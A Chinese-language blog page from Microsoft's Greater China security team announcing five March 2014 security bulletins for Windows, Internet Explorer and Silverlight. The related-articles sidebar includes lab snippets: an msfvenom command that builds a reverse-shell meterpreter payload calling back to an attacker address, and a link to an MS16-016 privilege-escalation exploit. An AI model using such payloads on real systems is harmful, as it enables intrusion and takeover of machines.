20140312,微软3月12日发布5个安全补丁

最新推荐文章于 2021-05-08 12:13:09 发布
最新推荐文章于 2021-05-08 12:13:09 发布
阅读量1.7k 收藏
点赞数
分类专栏: [安全消息]
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MSSecurity/article/details/21175685
版权


大家好,我们是微软大中华区安全支持团队。

微软于北京时间2014312日发布了5个新的安全公告,其中 2个为严重等级,其余3个为重要等级,共修复 Microsoft Windows,Internet Explorer Silverlight中的23个漏洞。请优先部署严重等级公告MS14-012

MS14-012 | InternetExplorer 的累积性安全更新

此安全更新可解决 Internet Explorer 1 个公开披露的漏洞和 17 个秘密报告的漏洞。如果用户使用 Internet Explorer 查看特制网页,则这些漏洞可能允许远程执行代码。此前微软获悉了一些在IE 10中利用漏洞CVE-2014-0322和在IE 8 中利用漏洞CVE-2014-0324的攻击。这两个漏洞在该补丁中均得到了相应的修复。

重新发布安全通报2755801

Microsoft 针对 Windows 8Windows Server 2012 Windows RT 上的 Internet Explorer 10 以及 Windows 8.1Windows Server 2012 R2 Windows RT 8.1 上的 Internet Explorer 11 发布了一个更新 (2938527)。该更新解决了 Adobe 安全公告 APSB14-08 中描述的漏洞。有关此更新的详细信息(包括下载链接),请参阅 Microsoft 知识库文章2938527

公告 ID

公告标题和摘要

最高严重等级

漏洞影响

重新启动要求

受影响的软件

MS14-012

Internet Explorer 的累积性安全更新 (2925418)

严重

远程执行代码

需要重启动

Microsoft Windows 
Internet Explorer

MS14-013

Microsoft DirectShow 中的漏洞可能允许远程执行代码 (2929961)

严重

远程执行代码

可能要求重新启动

Microsoft Windows

MS14-015

Windows 内核模式驱动程序中的漏洞可能允许特权提升 (2930275)

重要

特权提升

需要重启动

Microsoft Windows

MS14-016

安全帐户管理器远程 (SAMR) 协议中的漏洞可能允许安全功能绕过(2934418)

重要

安全功能绕过

需要重启动

Microsoft Windows

MS14-014

Silverlight 中的漏洞可能允许安全功能绕过 (2932677)

重要

安全功能绕过

无需重新启动

Microsoft Silverlight

 

详细信息请参考20143月安全公告摘要:

http://technet.microsoft.com/zh-cn/security/bulletin/ms14-mar

微软安全响应中心博客文章(英文)

http://blogs.technet.com/b/msrc/archive/2014/03/11/the-march-2014-security-updates.aspx

微软大中华区安全支持团队

 

MSSecurity
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2014-4114 和 CVE-2014-3566
微软大中华区安全博客
10-16 5055
这两天关注安全的人员都会特别留意这两个新披露的漏洞:CVE-2014-4114 和 CVE-2014-3566。下面我们就针对这两个漏洞最一些简要说明。CVE-2014-4114-------------------------这个漏洞已经在本周发布的MS14-060更新中被修复,我们建议用户尽快部署安装此安全更新来防范相关的潜在威胁。这个漏洞存在于Windows系统对于OLE内嵌对象的处理方
关于第三方Windows XP SP4更新包的说明
微软大中华区安全博客
09-04 4871
最近我们注意到有国外用户将Windows XP SP3以后的官方更新做了一个集合更新包,将其称为“非官方”Windows XP SP4安装包。国内的很多媒体也做了相关报道,并同时提供了下载链接。根据该安装包作者的描述,他只是将微软公开发布的XP相关补丁汇总在一起,做成一个安装包,因此对于之前已经安装了所有Windows XP更新的用户而言,这个更新包并没有额外的帮助。对于目前仍在使用Windo
渗透攻击之ms14-064漏洞利用实验
wylululu的博客
01-07 7725
ms14-064简介 Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 –Win10+IE11全版本。 实验步骤: 第一步:打开已安装好的kaili虚拟机系统,显示界面: 第二步:单击打开metasploit framework或者点击左上角应用程序&...
ms16-016提权
qq_54713392的博客
05-08 1136
ms16-016提权 简介:靶机需32位windows系统 攻击机:kali IP地址为:192.168.32.132 目标机:windows32 IP地址:192.168.32.135 先ping两台主机看是否通 步骤: 1)生成木马,设置本地ip地址192.168.32.132和端口号4444 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.132 LPORT=4444 -f exe > /root/test.exe 2)
[提权]MS16-016提权EXP
weixin_30621711的博客
01-12 1408
MS16-016提权EXP[K8]Tested On Win7 x86Usage: ms16-016_win7.exe "whoami"by K8拉登哥哥 20160216下载:http://pan.baidu.com/s/1c1r45c0 转载于:https://www.cnblogs.com/k8gege/p/10261356.html
[转译] 安全通报 2219475 发布
微软大中华区安全博客
06-11 1159
<br />《本文转译自 Microsoft Security Response Center 博客文章“Security Advisory 2219475 Released”》<br /><br />大家好!<br />我们发布了 安全通报2219475,描述 Windows XP 和 Windows Server 2003 的 Windows 帮助和支持中心功能存在的漏洞问题。我们目前尚未发现任何活跃的攻击。Windows Vista、Windows 7、Windows Server 2008 和 Wi
[新闻] 微软安全补丁提前通知
微软大中华区安全博客
03-05 1288
大家好,我是 Richard Chen。在此提前通知各位微软计划于三清晨发布两个安全补丁来修正所发现的漏洞。最高级别皆为重要等级。  按照受影响的操作系统分类如下: 关于 Office 补丁相关信息:   以下为提前通知的文章全文,请各位先行评估了解受影响的系统。 Microsoft Security Bulletin Ad
操作系统安全:Windows发展历程.pptx
06-02
1987年129 同时处理多个DOS应用程序,还引进了全新的键盘快捷键功能,允许应用程序的窗口在另一个窗口之上显示 全新的外观和三维触摸感提高了软件的运行速度和稳定性释放了更多的内存,可以在不同类型的处理器上...
服务器安全的管理.docx
最新发布
06-08
杭州网通互联公司 网管 刘蔚 2004年714 Win2000服务器网络安全设置 一、帐户安全管理 1.帐户要尽可能少,并且经常用一些扫描工具检查系统帐户,帐号权限及密码,删除已经不再使用的帐户 2.停用Guest帐号,并...
矩阵对抗与漏洞补丁200912
06-13
2009 年12 安全公告发布Windows7 首次享受周二补丁…………2 FreeBSD 官方的rtld 漏洞补丁终于释出(附修补方式)………………………3 面没见着就已修复四百BUG Firefox3.6 Beta4 发布…………………………4 为...
Ghost XP SP3 全功能装机版
04-18
2、安全补丁打全至2012年0401 3、采用自由天空EasySysprep_3.1Final增强版封装,更全面的更新SATA\SCSI\RAID驱动,兼容各类新旧计算机 4、更新驱动解压工具,自动识别台式机与笔记本电脑来解压不同的驱动程序 5、...
【CN更新版】JUJUMAO-WINXPSP3笔记本专用CD克隆装机版 2011.05
05-18
+打全补丁至2010年1227,含Office补丁,通过正版验证,绝不黑屏 +修改光盘启动界面(迎接新的一年) +金山毒霸2011杀毒套装(永久免费版) +更新Flash Player ActiveX 10.1.102.64正式版 +其它一些细节调整及...
Windows Server 2016需要的Servicing Stack Update (4132216)
微软大中华区安全博客
12-03 4988
如果您经常浏览Windows 10和对应服务器的更新历史,可能会注意到从517开始的一个重要信息。 Prerequisite: When installing both the servicing stack update (SSU) (KB4132216) and the latest cumulative update (LCU) from the Microsoft Update Ca...
微软发布带外安全更新MS14-068
微软大中华区安全博客
11-19 3940
1119微软发布了带外更新MS14-068以解决Windows 系统中的一个安全漏洞,该补丁安全等级为“严重”。MS14-068 | Kerberos 中的漏洞可能允许特权提升该安全更新解决了Windows Kerberos KDC 中一个秘密报告的漏洞。该漏洞可能允许普通域账户提升特权,进而获得域管理员的权限。攻击者要想成功利用该漏洞,其必须首先又有一个有效的域账户。针对该漏洞,微软
20150909,微软99发布12安全补丁
微软大中华区安全博客
09-09 2923
大家好,我们是微软大中华区安全支持团队。微软于北京时间2015年99发布12个新的安全公告,其中5个为严重等级,7个为重要等级,修复了Microsoft Windows、Microsoft Office、Internet Explorer、Microsoft .NET Framework、Microsoft Lync、Exchange Server和Microsoft Edge软件中的漏
20150311,微软311发布14个安全补丁
微软大中华区安全博客
03-11 2923
大家好,我们是微软大中华区安全支持团队。微软于北京时间2015年311发布了14个新的安全公告,其中5个为严重等级,9个为重要等级,修复MicrosoftWindows、MicrosoftOffice、MicrosoftExchange 和InternetExplorer中的漏洞。其中MS15-018和MS15-031所修复的漏洞中部分已经公开披露。与此同时,微软发布了一个新的安全通报:安
20151111,微软1111发布12安全补丁
微软大中华区安全博客
11-11 2843
大家好,我们是微软大中华区安全支持团队。微软于北京时间2015年1111发布12个新的安全公告,其中4个为严重等级,8个为重要等级,修复了Microsoft Windows、Microsoft Office、Microsoft Lync、Internet Explorer和Microsoft Edge软件中的漏洞。其中MS15-115中所修复的漏洞CVE-2015-6109、MS15-116
20151014,微软1014发布6个安全补丁
微软大中华区安全博客
10-14 2524
大家好,我们是微软大中华区安全支持团队。微软于北京时间2015年1014发布了6个新的安全公告,其中3个为严重等级,3个为重要等级,修复了Microsoft Windows、Microsoft Office、Internet Explorer和Microsoft Edge软件中的漏洞。其中MS15-106中所修复的漏洞CVE-2015-6056、MS15-110中所修复的漏洞CVE-201
发布的Windows Defender防病毒软件平台更新
微软大中华区安全博客
12-03 2444
企业用户的管理员可能注意到从2017年12开始,在Windows Server Update Service (WSUS)上,针对Windows Defender产品,除了每天三次的定义更新外,每还会有一个防病毒平台更新(Antimalware Platform Update)。 例如下图: 上图标题中的4.12.17007.18022是版本号。下图是在Windows 10 1709上...
微软kb2533623 x64补丁
05-11
微软kb2533623 x64补丁是微软公司发布的一个针对Windows操作系统的安全补丁。该补丁的主要功能是修复Windows操作系统中的一个漏洞,该漏洞可能导致黑客利用并入侵计算机系统。这个漏洞是在Windows处理网络数据包时...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值